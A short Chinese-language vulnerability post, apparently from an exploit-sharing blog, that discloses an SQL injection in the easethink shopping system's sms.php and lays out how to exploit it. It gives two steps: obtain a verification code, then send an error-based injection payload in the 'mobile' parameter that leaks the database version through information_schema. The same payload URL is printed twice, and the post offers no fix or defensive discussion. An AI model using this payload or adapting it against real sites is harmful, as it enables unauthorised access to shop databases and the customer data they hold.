easethink购物系统 sms.php 文件注射漏洞

  • A+
所属分类:漏洞时代
摘要

可以看到没做过滤
————————————
利用方法如下
1. http://demo.easethink.com/sms.php?act=subscribe  首先获得验证码! 将其拼接到下一步中的verify
2.   http://demo.easethink.com/sms.php?act=do_subscribe&verify=这里是获得的验证码填写地址&mobile=111’and(select%201%20from(select%20count(*),concat(0x7c,(select%20(Select%20version())%20from%20information_schema.tables%20limit%200,1),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%23

easethink购物系统 sms.php 文件注射漏洞

可以看到没做过滤
------------------------------------
利用方法如下
1.
http://demo.easethink.com/sms.php?act=subscribe 首先获得验证码!将其拼接到下一步中的verify
2.  
http://demo.easethink.com/sms.php?act=do_subscribe&verify=这里是获得的验证码填写地址&mobile=111'and(select%201%20from(select%20count(*),concat(0x7c,(select%20(Select%20version())%20from%20information_schema.tables%20limit%200,1),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%23

ok,没图没真相,上测试图
easethink购物系统 sms.php 文件注射漏洞

 

-----------------------------------------------------------------------

by:kk

 

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: